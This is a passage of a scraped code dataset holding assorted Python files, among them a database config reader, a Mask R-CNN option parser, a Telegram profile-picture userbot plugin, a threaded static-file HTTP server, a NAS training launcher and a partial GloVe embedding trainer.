l[0][\"predictionPoint\"]\n\tworksheet.write(j+1,2+col,nowPredictionPoint,cell_format)\n\tworksheet.write(j+1+raw,2+col,l[0][\"mse\"],mse_format)\n\tworksheet.write(j+1+raw,1,modelName,mse_format)\n\tworksheet.write(j+1+raw,0,dataName,mse_format)\n\tfor x in l:\n\t\tif(x[\"predictionPoint\"] != nowPredictionPoint):\n\t\t\tnowPara = x[\"para\"]\n\t\t\tnowPredictionPoint = x[\"predictionPoint\"]\n\t\t\tcol = col + 1\n\t\t\traw = 1\n\t\t\tworksheet.write(j+1,2+col,nowPredictionPoint,cell_format)\n\t\t\tworksheet.write(j+1+raw,2+col,x[\"mse\"],mse_format)\n\tworkbook.close();\n\n\t\n\n#-------------------------------------------------------------------------#\n#python c:\\\\xampp\\\\htdocs\\\\multi_DTWSE.py\n\n'''\n\n# 设置待处理的数据\nfileName = 'C:\\\\xampp\\\\htdocs\\\\DS1.txt'\ndataTuples = readDataFunction(fileName)\n# 设置参数文件\nparaFileName = 'C:\\\\xampp\\\\htdocs\\\\multi_para2.txt'\nparaTuples = readParaFunction(paraFileName)\nprint(paraTuples)\n# 运行一个Task\nparaTuple = paraTuples[0]\ndataTuple = dataTuples[0]\nresTuple = taskFunction(dataTuple,paraTuple)\n# 计算结果转换为数据记录指令\nsaveTuple = saveFunction(resTuple)\n\nprint(saveTuple[0])\nprint(saveTuple[1])\n\n'''\n\n\n\n\n\n","sub_path":"tool/Server/2020_10/1602242237654/multi_DTWSE.py","file_name":"multi_DTWSE.py","file_ext":"py","file_size_in_byte":9349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"94663984","text":"import configparser\nfrom pathlib import Path\n\nDB_CONFIG_FILE_NAME_PATTERN = \"db_config.*.ini\"\ndb_config_dir_path = Path(Path(__file__), \"../../../config\").resolve()\n\n\ndef get_db_config_file_name_help():\n more_info = (\n \"There are no usable database config files under the 'config' directory. \"\n + \"The name of a database config file should follow the '{}' pattern.\"\n ).format(DB_CONFIG_FILE_NAME_PATTERN)\n file_names = get_available_db_config_file_names()\n if file_names:\n more_info = \"The available names is/are: {}\".format(\", \".join(file_names))\n return \"The database configuration file name. 
\" + more_info\n\n\ndef get_db_connection_parameters(db_config_file_name):\n file_path = Path(db_config_dir_path, \"./\", db_config_file_name).resolve()\n config_parser = configparser.ConfigParser()\n config_parser.read(file_path)\n connection_parameters_section = config_parser[\"ConnectionParameters\"]\n\n return {\n \"host\": connection_parameters_section.get(\"host\"),\n \"database\": connection_parameters_section.get(\"database\"),\n \"user\": connection_parameters_section.get(\"user\"),\n \"password\": connection_parameters_section.get(\"password\"),\n \"time_zone\": connection_parameters_section.get(\"time_zone\"),\n }\n\n\ndef get_available_db_config_file_names():\n file_paths = sorted(db_config_dir_path.glob(DB_CONFIG_FILE_NAME_PATTERN))\n names = []\n for file_path in file_paths:\n names.append(file_path.name)\n return names","sub_path":"lib/utils/db_config.py","file_name":"db_config.py","file_ext":"py","file_size_in_byte":1500,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"580595133","text":"from argparse import Namespace\nfrom gooey import GooeyParser\nfrom pathlib import Path\n\nimport numpy as np\n\nfrom .mrcnn.config import Config\nfrom .fix_validator import fix_validator\n\nMODEL_DIR = Path(\"checkpoint/Mask_RCNN/\")\n\n\ndef build_config_parser(\n parser: GooeyParser = GooeyParser(description='Build Option'),\n config: Config = Config(),\n modifiable: bool = True,\n ) -> GooeyParser:\n\n parser.add_argument(\n '--num_classes',\n type=eval,\n metavar=\"Classes\",\n help=\"Number of classes (including background).\",\n default=config.NUM_CLASSES,\n gooey_options=({} if modifiable else\n fix_validator(config.NUM_CLASSES))\n )\n\n backbone_parser = parser.add_argument_group(\n 'Backbone')\n\n backbone_parser.add_argument(\n '--backbone',\n choices=['resnet50', 'resnet101'],\n metavar='Backbone',\n help='Backbone network architecture',\n default=config.BACKBONE,\n gooey_options=({} if modifiable else\n fix_validator(config.BACKBONE))\n )\n\n rpn_parser = parser.add_argument_group(\n 'RPN',\n 'Region Proposal Network',\n )\n\n rpn_parser.add_argument(\n '--rpn_anchor_scales',\n type=eval,\n metavar='RPN Anchor Scales',\n default=config.RPN_ANCHOR_SCALES,\n help='Length of square anchor side in pixels',\n gooey_options=({} if modifiable else\n fix_validator(config.RPN_ANCHOR_SCALES))\n )\n\n log_parser = parser.add_argument_group(\n 'Log',\n \"Show and Save model options\",\n gooey_options={'show_border': True, 'columns': 4}\n )\n log_parser.add_argument(\n \"--print-model-summary\", action='store_true',\n )\n log_parser.add_argument(\n \"--log-dir\", type=str,\n metavar=\"Log Directory Path\",\n default=(MODEL_DIR.joinpath('untitled')\n if config.NAME is None\n else MODEL_DIR.joinpath(str(config.NAME))),\n help='{}{}TIME{}/'.format(\n MODEL_DIR.joinpath('LOG_NAME'),\n '{', '}')\n )\n # show_and_save_parser.add_argument(\n # \"--save-path\", type=str,\n # metavar=\"File path\",\n # default=\"model.h5\",\n # help=\"model name to save model\",\n # )\n # show_and_save_parser.add_argument(\n # \"--save-file\", type=str,\n # metavar=\"Overwrite File\",\n # help=\"model name to save model\",\n # widget=\"FileChooser\",\n # )\n\n return parser\n\n\ndef build_config(args: Namespace) -> Config:\n class BuildConfig(Config):\n NAME = Path(args.log_dir).name\n\n NUM_CLASSES = args.num_classes\n\n BACKBONE = args.backbone\n\n RPN_ANCHOR_SCALES = args.rpn_anchor_scales\n\n def __init__(self):\n super(BuildConfig, self).__init__()\n\n 
return BuildConfig()\n","sub_path":"model/Mask_RCNN/build_config.py","file_name":"build_config.py","file_ext":"py","file_size_in_byte":3027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"472860534","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Aug 15 22:40:48 2018\n\n@author: rupert\n\"\"\"\n\nfd=open(\"testpattern3.lines\",'w')\ny=20\nfor i in range(100):\n fd.write(\"%f %f %f %f\\n\"%(i,y,i,-y))\n y*=-1\nfd.close()\n","sub_path":"PlotterTests/testpattern3.py","file_name":"testpattern3.py","file_ext":"py","file_size_in_byte":231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"177133675","text":"\"\"\"\nTime In Profile Pic.....\nCommand: `.bloom`\n\nHmmmm U need to config RAVANA_LEELA var in Heroku with any telegraph image link\n\n:::::Credit Time::::::\n1) Coded By: @s_n_a_p_s\n2) Ported By: @r4v4n4 (Noodz Lober)\n3) End Game Help By: @spechide\n4) Better Colour Profile Pic By @PhycoNinja13b\n\n#curse: who ever edits this credit section will goto hell\n\n⚠️DISCLAIMER⚠️\n\nUSING THIS PLUGIN CAN RESULT IN ACCOUNT BAN. WE DONT CARE ABOUT BAN, SO WE ARR USING THIS.\n\"\"\"\nimport os\nfrom datetime import datetime\nfrom PIL import Image, ImageDraw, ImageFont\nfrom pySmartDL import SmartDL\nfrom telethon.tl import functions\nfrom uniborg.util import admin_cmd\nimport asyncio\nimport shutil \nimport random\n\nFONT_FILE_TO_USE = \"/usr/share/fonts/truetype/dejavu/DejaVuSans.ttf\"\n\n@borg.on(admin_cmd(pattern=\"bloom ?(.*)\"))\nasync def autopic(event): \n await event.edit(\"Bloom colour profile pic have been enabled © @R4V4N4\") \n downloaded_file_name = \"./ravana/original_pic.png\"\n downloader = SmartDL(Config.RAVANA_LEELA, downloaded_file_name, progress_bar=True)\n downloader.start(blocking=False)\n photo = \"photo_pfp.png\"\n while not downloader.isFinished():\n place_holder = None\n\n while True:\n #RIP Danger zone Here no editing here plox\n R = random.randint(0,256)\n B = random.randint(0,256)\n G = random.randint(0,256)\n FR = (256 - R) \n FB = (256 - B) \n FG = (256 - G) \n shutil.copy(downloaded_file_name, photo)\n image = Image.open(photo)\n image.paste( (R, G, B), [0,0,image.size[0],image.size[1]])\n image.save(photo)\n \n #Edit only Below part 🌚 Or esle u will be responsible 🤷‍♂\n current_time = datetime.now().strftime(\"\\n Time: %H:%M:%S \\n \\n Date: %d/%m/%y\")\n img = Image.open(photo)\n drawn_text = ImageDraw.Draw(img)\n fnt = ImageFont.truetype(FONT_FILE_TO_USE, 60)\n ofnt = ImageFont.truetype(FONT_FILE_TO_USE, 250)\n drawn_text.text((200, 400), current_time, font=fnt, fill=(FR,FG,FB))\n drawn_text.text((250, 250), \" 😈\", font = ofnt, fill=(FR,FG,FB))\n img.save(photo)\n file = await event.client.upload_file(photo) # pylint:disable=E0602\n try:\n await event.client(functions.photos.UploadProfilePhotoRequest( # pylint:disable=E0602\n file\n ))\n os.remove(photo)\n await asyncio.sleep(20)\n except:\n return\n","sub_path":"userbot/plugins/Bloom.py","file_name":"Bloom.py","file_ext":"py","file_size_in_byte":2473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"254882176","text":"import mimetypes\nimport os\nimport socket\nimport typing\n\nfrom request import Request\nfrom response import Response\nfrom threading import Thread\nfrom queue import Queue, Empty\n\nSERVER_ROOT = \"www\"\n\n\ndef serve_file(sock: socket.socket, path: str) -> None:\n \"\"\"Given a socket and the 
relative path to a file (relative to\n SERVER_ROOT), send that file to the socket if it exists. If the\n file doesn't exist, send a \"404 Not Found\" response.\n \"\"\"\n if path == \"/\":\n path = \"/index.html\"\n\n abspath = os.path.normpath(os.path.join(SERVER_ROOT, path.lstrip(\"/\")))\n if not abspath.startswith(SERVER_ROOT):\n response = Response(status=\"404 Not Found\", content=\"Not Found\")\n response.send(sock)\n return\n\n try:\n with open(abspath, \"rb\") as f:\n content_type, encoding = mimetypes.guess_type(abspath)\n if content_type is None:\n content_type = \"application/octet-stream\"\n\n if encoding is not None:\n content_type += f\"; charset={encoding}\"\n\n response = Response(status=\"200 OK\", body=f)\n response.headers.add(\"content-type\", content_type)\n response.send(sock)\n return\n except FileNotFoundError:\n response = Response(status=\"404 Not Found\", content=\"Not Found\")\n response.send(sock)\n return\n\n\nclass HTTPWorker(Thread):\n def __init__(self, connection_queue: Queue) -> None:\n super().__init__(daemon=True)\n\n self.connection_queue = connection_queue\n self.running = False\n\n def stop(self) -> None:\n self.running = False\n\n def run(self) -> None:\n self.running = True\n while self.running:\n try:\n client_sock, client_addr = self.connection_queue.get(timeout=1)\n except Empty:\n continue\n\n try:\n self.handle_client(client_sock, client_addr)\n except Exception as e:\n print(f\"Unhandled error: {e}\")\n continue\n finally:\n self.connection_queue.task_done()\n\n def handle_client(self, client_sock: socket.socket, client_addr: typing.Tuple[str, int]) -> None:\n with client_sock:\n try:\n request = Request.from_socket(client_sock)\n if \"100-continue\" in request.headers.get(\"expect\", \"\"):\n response = Response(status=\"100 Continue\")\n response.send(client_sock)\n\n try:\n content_length = int(request.headers.get(\"content-length\", \"0\"))\n except ValueError:\n content_length = 0\n\n if content_length:\n body = request.body.read(content_length)\n print(\"Request body\", body)\n\n if request.method != \"GET\":\n response = Response(status=\"405 Method Not Allowed\", content=\"Method Not Allowed\")\n response.send(client_sock)\n return\n\n serve_file(client_sock, request.path)\n except Exception as e:\n print(f\"Failed to parse request: {e}\")\n response = Response(status=\"400 Bad Request\", content=\"Bad Request\")\n response.send(client_sock)\n\n\nclass HTTPServer:\n def __init__(self, host=\"127.0.0.1\", port=9000, worker_count=16) -> None:\n self.host = host\n self.port = port\n self.worker_count = worker_count\n self.worker_backlog = worker_count * 8\n self.connection_queue = Queue(self.worker_backlog)\n\n def serve_forever(self) -> None:\n workers = []\n for _ in range(self.worker_count):\n worker = HTTPWorker(self.connection_queue)\n worker.start()\n workers.append(worker)\n\n with socket.socket() as server_sock:\n server_sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n server_sock.bind((self.host, self.port))\n server_sock.listen(self.worker_backlog)\n print(f\"Listening on {self.host}:{self.port}...\")\n\n while True:\n try:\n # client_sock, client_addr = server_sock.accept()\n self.connection_queue.put(server_sock.accept())\n except KeyboardInterrupt:\n break\n\n for worker in workers:\n worker.stop()\n\n for worker in workers:\n worker.join(timeout=30)\n\n\nserver = 
HTTPServer()\nserver.serve_forever()\n","sub_path":"part_02/web-app-from-scratch/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":4550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"547809660","text":"import argparse\nimport time\nfrom models import ImagenetRunConfig\nfrom nas_manager import ProgressiveArchSearchConfig\nfrom models import Cifar10RunConfig\nfrom nas_manager import *\nfrom models.super_nets.super_progressive import Cifar10SuperProgressiveNASNets as SuperProgressiveNASNets\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--path', type=str, default='Cifar10_EXP/%s' % time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time())))\nparser.add_argument('--gpu', help='gpu available', default='0,1,2,3')\nparser.add_argument('--resume', action='store_true')\nparser.add_argument('--manual_seed', default=0, type=int)\n\n\"\"\" run config \"\"\"\nparser.add_argument('--n_epochs', type=int, default=5, help='how many epoches each layer to be trained')\nparser.add_argument('--init_lr', type=float, default=0.025)\nparser.add_argument('--lr_schedule_type', type=str, default='cosine')\nparser.add_argument('--dataset', type=str, default='cifar10', choices=['imagenet', 'cifar10'])\nparser.add_argument('--resize_to_224', action='store_true', help='resize cifar10 img to 224x224')\nparser.add_argument('--train_batch_size', type=int, default=64)\nparser.add_argument('--test_batch_size', type=int, default=128)\nparser.add_argument('--valid_size', type=int, default=None)\nparser.add_argument('--resize_scale', type=float, default=0.08)\nparser.add_argument('--distort_color', type=str, default='normal', choices=['normal', 'strong', 'None'])\nparser.add_argument('--cutout', action='store_true')\nparser.add_argument('--cutout_length', type=int, default=16)\nparser.add_argument('--opt_type', type=str, default='sgd', choices=['sgd'])\nparser.add_argument('--momentum', type=float, default=0.9) # opt_param\nparser.add_argument('--no_nesterov', action='store_true') # opt_param\nparser.add_argument('--weight_decay', type=float, default=4e-5)\nparser.add_argument('--label_smoothing', type=float, default=0.1)\nparser.add_argument('--no_decay_keys', type=str, default=None, choices=[None, 'bn', 'bn#bias'])\nparser.add_argument('--low_lr_parts', type=str, default=None, choices=[None, 'determined']) # !!!!!!!!!!!!!!!!!!!!!!\nparser.add_argument('--model_init', type=str, default='he_fout', choices=['he_fin', 'he_fout'])\nparser.add_argument('--init_div_groups', action='store_true')\nparser.add_argument('--validation_frequency', type=int, default=1)\nparser.add_argument('--print_frequency', type=int, default=10)\nparser.add_argument('--n_worker', type=int, default=32)\n\n\"\"\" net config \"\"\"\nparser.add_argument('--depth', type=int, default=92) # 74\nparser.add_argument('--alpha', type=int, default=48) # 48 84\n\nparser.add_argument('--bn_momentum', type=float, default=0.1)\nparser.add_argument('--bn_eps', type=float, default=1e-3)\nparser.add_argument('--dropout', type=float, default=0)\nparser.add_argument('--enable_mix', action='store_true')\nparser.add_argument('--share_mix_layer', action='store_true')\nparser.add_argument('--share_classifier', action='store_true')\nparser.add_argument('--enable_init_mix', action='store_true')\nparser.add_argument('--fix_determined', action='store_true')\n\nparser.add_argument('--pretrained_epochs', type=int, default=5)\nparser.add_argument('--pretrained_batch', type=int, 
default=128)\nparser.add_argument('--determined_train', action='store_true')\nparser.add_argument('--re_init', type=str, default='last_determined', choices=['last_determined', 'determined_part', 'no_reinit'])\nparser.add_argument('--determined_train_epoch', type=int, default=20)\nparser.add_argument('--determined_train_batch', type=int, default=128)\n\n\"\"\" shared hyper-parameters \"\"\"\nparser.add_argument('--target_hardware', type=str, default=None, choices=['cpu', 'gpu1', None])\nparser.add_argument('--reg_loss_type', type=str, default='add', choices=['add', 'mul'])\nparser.add_argument('--reg_loss_acc', type=float, default=0.9) # reg_loss_params\nparser.add_argument('--reg_loss_latency', type=float, default=0.1) # reg_loss_params\n\nif __name__ == '__main__':\n args = parser.parse_args()\n\n torch.manual_seed(args.manual_seed)\n torch.cuda.manual_seed_all(args.manual_seed)\n np.random.seed(args.manual_seed)\n\n os.environ['CUDA_VISIBLE_DEVICES'] = args.gpu\n\n os.makedirs(args.path, exist_ok=True)\n\n # build run config from args\n args.lr_schedule_param = None\n args.opt_param = {\n 'momentum': args.momentum,\n 'nesterov': not args.no_nesterov,\n }\n run_config = Cifar10RunConfig(\n **args.__dict__\n )\n\n # args.conv_candidates = [\n # '3x3_MBConv1', '3x3_MBConv2', '3x3_MBConv3', '3x3_MBConv4', '3x3_MBConv5', '3x3_MBConv6',\n # '5x5_MBConv1', '5x5_MBConv2', '5x5_MBConv3', '5x5_MBConv4', '5x5_MBConv5', '5x5_MBConv6',\n # '7x7_MBConv1', '7x7_MBConv2', '7x7_MBConv3', '7x7_MBConv4', '7x7_MBConv5', '7x7_MBConv6',\n # ]\n\n args.conv_candidates = [\n '3x3_SEMBConv1', '3x3_SEMBConv2', '3x3_SEMBConv3', '3x3_SEMBConv4', '3x3_SEMBConv5', '3x3_SEMBConv6',\n '5x5_SEMBConv1', '5x5_SEMBConv2', '5x5_SEMBConv3', '5x5_SEMBConv4', '5x5_SEMBConv5', '5x5_SEMBConv6',\n '7x7_SEMBConv1', '7x7_SEMBConv2', '7x7_SEMBConv3', '7x7_SEMBConv4', '7x7_SEMBConv5', '7x7_SEMBConv6',\n ]\n\n # args.conv_candidates = [\n # '3x3_SEMBConv1', '3x3_SEMBConv2', '3x3_SEMBConv3', '3x3_SEMBConv4', '3x3_SEMBConv5', '3x3_SEMBConv6',\n # '5x5_SEMBConv1', '5x5_SEMBConv2', '5x5_SEMBConv3', '5x5_SEMBConv4', '5x5_SEMBConv5', '5x5_SEMBConv6',\n # '7x7_SEMBConv1', '7x7_SEMBConv2', '7x7_SEMBConv3', '7x7_SEMBConv4', '7x7_SEMBConv5', '7x7_SEMBConv6',\n # 'Bottleneck_3x3Conv_Expand0', 'Bottleneck_3x3Conv_Expand1', 'Bottleneck_3x3Conv_Expand2',\n # 'Bottleneck_5x5Conv_Expand0', 'Bottleneck_5x5Conv_Expand1', 'Bottleneck_5x5Conv_Expand2',\n # 'Bottleneck_7x7Conv_Expand0', 'Bottleneck_7x7Conv_Expand1', 'Bottleneck_7x7Conv_Expand2',\n # ]\n\n # args.conv_candidates = [\n # 'Bottleneck_3x3Conv_Expand0', 'Bottleneck_3x3Conv_Expand1', 'Bottleneck_3x3Conv_Expand2',\n # 'Bottleneck_5x5Conv_Expand0', 'Bottleneck_5x5Conv_Expand1', 'Bottleneck_5x5Conv_Expand2',\n # 'Bottleneck_7x7Conv_Expand0', 'Bottleneck_7x7Conv_Expand1', 'Bottleneck_7x7Conv_Expand2',\n # ]\n\n # args.conv_candidates = [\n # 'Bottleneck_3x3Conv_Expand0', 'Bottleneck_3x3Conv_Expand1', 'Bottleneck_3x3Conv_Expand2',\n # 'Bottleneck_5x5Conv_Expand0', 'Bottleneck_5x5Conv_Expand1', 'Bottleneck_5x5Conv_Expand2',\n # 'Bottleneck_7x7Conv_Expand0', 'Bottleneck_7x7Conv_Expand1', 'Bottleneck_7x7Conv_Expand2',\n # 'Bottleneck_11x11Conv_Expand0', 'Bottleneck_11x11Conv_Expand1', 'Bottleneck_11x11Conv_Expand2',\n # ]\n\n # args.conv_candidates = [\n # 'BasicBlock_3x3Conv_Expand0', 'BasicBlock_3x3Conv_Expand1',\n # 'BasicBlock_5x5Conv_Expand0', 'BasicBlock_5x5Conv_Expand1',\n # 'BasicBlock_7x7Conv_Expand0', 'BasicBlock_7x7Conv_Expand1',\n # ]\n\n # args.conv_candidates = [\n # 
'BasicBlock_3x3Conv_Expand0', 'BasicBlock_3x3Conv_Expand1',\n # 'BasicBlock_5x5Conv_Expand0', 'BasicBlock_5x5Conv_Expand1',\n # 'BasicBlock_7x7Conv_Expand0', 'BasicBlock_7x7Conv_Expand1',\n # 'BasicBlock_11x11Conv_Expand0', 'BasicBlock_11x11Conv_Expand1',\n # ]\n\n super_net = SuperProgressiveNASNets(\n depth=args.depth, alpha=args.alpha, conv_candidates=args.conv_candidates,\n n_classes=run_config.data_provider.n_classes, bn_param=(args.bn_momentum, args.bn_eps),\n dropout_rate=args.dropout, enable_mix=args.enable_mix, share_mix_layer=args.share_mix_layer,\n share_classifier=args.share_classifier, enable_init_mix=args.enable_init_mix,\n fix_determined=args.fix_determined\n )\n\n if args.reg_loss_type == 'add':\n args.reg_loss_params = {\n 'w_acc': args.reg_loss_acc,\n 'w_latency': args.reg_loss_latency,\n }\n arch_search_config = ProgressiveArchSearchConfig(**args.__dict__)\n\n print('Run config:')\n for k, v in run_config.config.items():\n print('\\t%s: %s' % (k, v))\n print('Architecture Search config:')\n for k, v in arch_search_config.config.items():\n print('\\t%s: %s' % (k, v))\n\n # arch search run manager\n arch_search_run_manager = ArchSearchRunManager(args.path, super_net, run_config, arch_search_config)\n\n # resume\n if args.resume:\n try:\n arch_search_run_manager.load_model()\n except Exception as e:\n print('fail to load models: %s' % e)\n\n if arch_search_run_manager.pretrain:\n arch_search_run_manager.init_train(pretrain_epochs=args.pretrained_epochs,\n pretrained_batch=args.pretrained_batch)\n\n # training\n arch_search_run_manager.train(args.re_init)\n","sub_path":"cifar10_arch_search.py","file_name":"cifar10_arch_search.py","file_ext":"py","file_size_in_byte":8710,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"439130140","text":"import sys\nfrom PyQt5.QtWidgets import QApplication, QWidget, QDialog\n#This code just displays one GUI element \n\n\n\n#import the module created in the qtdesigner\nfrom dialog1 import Ui_InitalDialog\nfrom dialog2 import Ui_Dialog2\nfrom dialog3 import Ui_Dialog3\n\nclass AppWindow1(QDialog):\n def __init__(self):\n super(QDialog, self).__init__()\n self.ui = Ui_InitalDialog()\n self.ui.setupUi(self)\n self.show()\n\nclass AppWindow2(QDialog):\n def __init__(self):\n super(QDialog, self).__init__()\n self.ui = Ui_Dialog2()\n self.ui.setupUi(self)\n self.show()\nclass AppWindow3(QDialog):\n def __init__(self):\n super(QDialog, self).__init__()\n self.ui = Ui_Dialog3()\n self.ui.setupUi(self)\n self.show()\n\n#show the window on PC\napp = QApplication(sys.argv)\n#switch case to define which window shall be opend\nw = AppWindow1()\n#w = AppWindow2()\n#w = AppWindow3()\n#End of switch case\nw.show()\nsys.exit(app.exec_())\n#End of showing window on PC","sub_path":"GUI/app_show1.py","file_name":"app_show1.py","file_ext":"py","file_size_in_byte":1017,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"528878661","text":"d={\r\n \"key\": 3,\r\n \"foo\": {\r\n \"a\": 5,\r\n \"bar\": {\r\n \"baz\": 8\r\n }\r\n }\r\n}\r\ndef apna_fun(dd, separator ='.', prefix =''): \r\n return { prefix + separator + k if prefix else k : v \r\n \r\n for kk, vv in dd.items() \r\n for k, v in apna_fun(vv, separator, kk).items() \r\n } if type(dd)==dict else { prefix : dd } \r\n \r\n\r\nprint ( (apna_fun(d))) 
\r\n\r\n\r\n","sub_path":"nested_dict1.py","file_name":"nested_dict1.py","file_ext":"py","file_size_in_byte":398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"50525140","text":"# coding=utf-8\nfrom random import randint\n\n\nclass Player(object):\n def __init__(self, name):\n self.name = name\n self.price = randint(1000, 9000)\n self.training = False\n self.vacation = False\n\n def onTraining(self):\n self.training = True\n return self.training\n\n def onVacation(self):\n self.vacation = True\n return self.vacation\n\n def getPrice(self):\n return self.price\n\n def status(self):\n return (self.vacation or self.training)\n\n\nclass Manager(object):\n def __init__(self, player):\n self.managed_player = player\n print('Managing Player: {}'.format(self.managed_player.name))\n\n def send_player_on(self, typee):\n if typee in ['vacation', 'training']:\n if typee == 'vacation':\n print('Sending player: {} on vacation'.format(self.managed_player.name))\n self.managed_player.onVacation()\n else:\n print('Sending player: {} on training'.format(self.managed_player.name))\n self.managed_player.onTraining()\n else:\n print('Can\\'t send player on: {}, it\\'s not a valid option!'.format(typee))\n\n def sell_player(self, offer):\n print('The price of the player is: {}'.format(self.managed_player.getPrice()))\n if offer > self.managed_player.getPrice():\n print('Saying goodbye to {}'.format(self.managed_player.name))\n else:\n print('Saying No to the offer, as the player {} is more valuable!'.format(self.managed_player.name))\n\nif __name__ == '__main__':\n fballer = Player('Daniel')\n mgr = Manager(fballer)\n\n # mgr.send_player_on('vacation')\n mgr.send_player_on('training')\n\n mgr.sell_player(1000)\n","sub_path":"Proxy/Proxy.py","file_name":"Proxy.py","file_ext":"py","file_size_in_byte":1755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"491995628","text":"import numpy as np\nimport tensorflow as tf\nfrom tqdm import tqdm\nimport itertools\nimport random\nimport os\nimport pickle\nimport argparse\nfrom collections import defaultdict\n\nclass GloVe(tf.keras.Model):\n def __init__(self, save_dir, embedding_dim=256, max_vocab_size=1000, scaling_factor=0.75, batch_size=512, num_epochs=50, learning_rate=0.01):\n super(GloVe, self).__init__()\n self.embedding_dim = embedding_dim\n self.max_vocab_size = max_vocab_size\n self.scaling_factor = scaling_factor\n self.batch_size = batch_size\n self.num_epochs = num_epochs\n\n self.vocab_size = 0\n self.concept2id = None\n self.comap = None\n self.comatrix = None\n self.optimizer = tf.keras.optimizers.Adagrad(learning_rate=learning_rate)\n self.save_dir = save_dir\n self.epoch_loss_avg = []\n \n def buildCoMatrix(self, patient_record):\n self.concept2id = build_dict(count_unique(patient_record))\n self.vocab_size = len(self.concept2id.keys())\n self.comap = defaultdict(float)\n self.comatrix = np.zeros((self.vocab_size, self.vocab_size), dtype=np.float64)\n\n for i in tqdm(range(len(patient_record))):\n patient = patient_record[i]\n for p in patient:\n for k in patient:\n if p != k:\n self.comap[(p, k)] += 1\n \n for pair, count in self.comap.items():\n self.comatrix[self.concept2id[pair[0]], self.concept2id[pair[1]]] = count\n\n def initParams(self):\n with tf.device(\"/cpu:0\"):\n \"\"\"must be implemented with cpu-only env since this is sparse updating\"\"\"\n self.target_embeddings = tf.Variable(tf.random.uniform([self.vocab_size, 
self.embedding_dim], 0.1, -0.1),\n name=\"target_embeddings\")\n self.context_embeddings = tf.Variable(tf.random.uniform([self.vocab_size, self.embedding_dim], 0.1, -0.1),\n name=\"context_embeddings\")\n self.target_biases = tf.Variable(tf.random.uniform([self.vocab_size], 0.1, -0.1),\n name='target_biases')\n self.context_biases = tf.Variable(tf.random.uniform([self.vocab_size], 0.1, -0.1),\n name=\"context_biases\")\n\n def computeCost(self, x):\n with tf.device(\"/gpu:0\"):\n \"\"\"x = [target_ind, context_ind, co_occurrence_count]\"\"\"\n target_emb = tf.nn.embedding_lookup([self.target_embeddings], x[0])\n context_emb = tf.nn.embedding_lookup([self.context_embeddings], x[1])\n target_bias = tf.nn.embedding_lookup([self.target_biases], x[0])\n context_bias = tf.nn.embedding_lookup([self.context_biases], x[1])\n\n weight = tf.math.minimum(1.0, tf.math.pow(tf.math.truediv(x[2], tf.cast(self.max_vocab_size, dtype=tf.float32)), self.scaling_factor))\n \n emb_product = tf.math.reduce_sum(tf.math.multiply(target_emb, context_emb), axis=1)\n log_cooccurrence = tf.math.log(tf.add(tf.cast(x[2], dtype=tf.float32), 1))\n \n distance_cost = tf.math.square(\n tf.math.add_n([emb_product, target_bias, context_bias, tf.math.negative(log_cooccurrence)]))\n \n batch_cost = tf.math.reduce_sum(tf.multiply(weight, distance_cost))\n \n return batch_cost\n\n def computeGradients(self, x):\n with tf.GradientTape() as tape:\n cost = self.computeCost(x)\n return cost, tape.gradient(cost, self.trainable_variables)\n\n def prepareBatch(self):\n i_ids = []\n j_ids = []\n co_occurs = []\n comap_list = list(self.comap.items())\n\n for pair, co_occur in comap_list:\n i_ids.append(self.concept2id[pair[0]])\n j_ids.append(self.concept2id[pair[1]])\n co_occurs.append(co_occur)\n \n assert len(i_ids) == len(j_ids), \"The length of the data are not the same\"\n assert len(i_ids) == len(co_occurs), \"The length of the data are not the same\"\n return i_ids, j_ids, co_occurs\n\n def getEmbeddings(self):\n self.embeddings = self.target_embeddings + self.context_embeddings\n \n def saveEmbeddings(self, epoch, avg_loss):\n self.getEmbeddings()\n np.save(os.path.join(self.save_dir, \"glove_emb_e{:03d}_loss{:.4f}.npy\".format(epoch, avg_loss)),\n self.embeddings)\n print(\"Embedding results have been saved in the output path\")\n\n def saveConcept2id(self):\n with open(self.save_dir + \"/concept2id_glove.pkl\", \"wb\") as f:\n pickle.dump(self.concept2id, f)\n print(\"concept2id successfully saved in the output path\")\n\n def trainModel(self):\n i_ids, j_ids, co_occurs = self.prepareBatch()\n total_batch = int(np.ceil(len(i_ids) / self.batch_size))\n cost_avg = tf.keras.metrics.Mean()\n\n for epoch in range(self.num_epochs):\n progbar = tf.keras.utils.Progbar(len(i_ids))\n \n for i in range(total_batch):\n i_batch = i_ids[i * self.batch_size : (i+1) * self.batch_size]\n j_batch = j_ids[i * self.batch_size : (i+1) * self.batch_size]\n co_occurs_batch = co_occurs[i * self.batch_size : (i+1) * self.batch_size]\n cost, gradients = self.computeGradients([i_batch, j_batch, co_occurs_batch])\n self.optimizer.apply_gradients(zip(gradients, self.trainable_variables))\n cost_avg(cost) \n progbar.add(self.batch_size)\n print(\"Step {}: Loss: {:.4f}\".format(self.optimizer.iterations.numpy(), cost))\n \n if (epoch % 1) == 0: \n avg_loss = cost_avg.result()\n print(\"Epoch {}: Loss: {:.4f}\".format(epoch, avg_loss))\n self.epoch_loss_avg.append(avg_loss)\n \n self.saveEmbeddings(epoch, avg_loss)\n self.saveConcept2id()\n\ndef 
